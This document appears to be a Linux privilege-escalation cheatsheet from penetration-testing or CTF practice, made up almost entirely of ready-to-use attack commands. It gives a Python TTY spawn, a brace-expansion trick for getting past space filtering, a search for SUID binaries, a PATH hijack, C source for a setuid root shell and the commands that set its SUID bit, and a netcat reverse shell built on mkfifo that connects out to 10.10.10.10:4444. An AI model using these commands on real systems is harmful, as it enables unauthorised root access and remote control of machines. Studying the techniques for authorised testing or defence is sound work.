Linux Privilege Escalation Cheatsheet

Spawn TTY Shell with Python

python -c 'import pty; pty.spawn("/bin/sh")'

Call list of available shells

cat /etc/shells

It can be very important, cause some exploits should be changed to work with or without some shells.

Execute shell commands when spaces are filtered

For example when I executed ls -lia I have:

error

So to execute something like ls -lia you can send:

{ls,-lia}

source

Searching for all SUID files

find / -perm -u=s -type f 2>/dev/null

ln -s /path/to/file /path/to/symlink

Add current directory to PATH variable

export PATH=.:$PATH

Suid file to spawn root shell

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}

Add suid bit to C shell file

cp /tmp/shell /home/admin/shell
chmod +s /home/admin/shell

NetCat reverse shell if no ā€˜-eā€™ or ā€˜-cā€™ options

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/f

Compile exploit for older glibs

gcc exploit.c -m32 -o exploit -Wl,--hash-style=both

RedHat ifconfig alternative

cat /etc/sysconfig/network-scripts/ifcfg-eth0

MySQL privilege escalation technique

Nicely described here

Resources

Kernel-exploits.com Basic Linux Privilege Escalation - HUUUGE guide by g0tmi1k